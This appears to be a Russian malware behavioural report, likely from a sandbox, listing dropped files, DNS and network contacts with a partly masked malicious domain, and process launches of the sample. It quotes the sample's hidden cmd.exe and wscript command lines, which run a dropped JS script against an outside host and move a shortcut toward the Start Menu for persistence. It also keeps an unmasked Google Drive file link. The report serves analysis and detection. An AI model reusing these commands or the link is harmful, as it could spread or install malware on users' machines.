Техническая информация
- %TEMP%\msedge.lnk
- %TEMP%\msedge.lnk
- %TEMP%\otutyqt.js
- 'go####docpage.com':443
- 'drive.google.com':443
- 'fo###.#oogleapis.com':443
- 'fo###.gstatic.com':443
- 'go####docpage.com':443
- 'drive.google.com':443
- 'fo###.#oogleapis.com':443
- 'gs##tic.com':443
- DNS ASK go####docpage.com
- DNS ASK drive.google.com
- DNS ASK microsoft.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK gs##tic.com
- DNS ASK fo###.gstatic.com
- DNS ASK ss#.#static.com
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\otutyqt.js" www.go####docpage.com/ 1
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\otutyqt.js" www.go####docpage.com/ 2
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\otutyqt.js" www.go####docpage.com/ 1 & start /b wscript "%TEMP%\otutyqt.js" www.go####docpage.com/ 2 & move "%TEMP%\MSEdge.lnk" "%APPDATA%\Microsoft\Windows\Start Me...' (со скрытым окном)
- '%WINDIR%\syswow64\explorer.exe' "https://drive.google.com/file/d/1trBRwq10DsOK1bxUdYkcgqs7wpZYrJlR/view"
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\otutyqt.js" www.go####docpage.com/ 1 & start /b wscript "%TEMP%\otutyqt.js" www.go####docpage.com/ 2 & move "%TEMP%\MSEdge.lnk" "%APPDATA%\Microsoft\Windows\Start Me...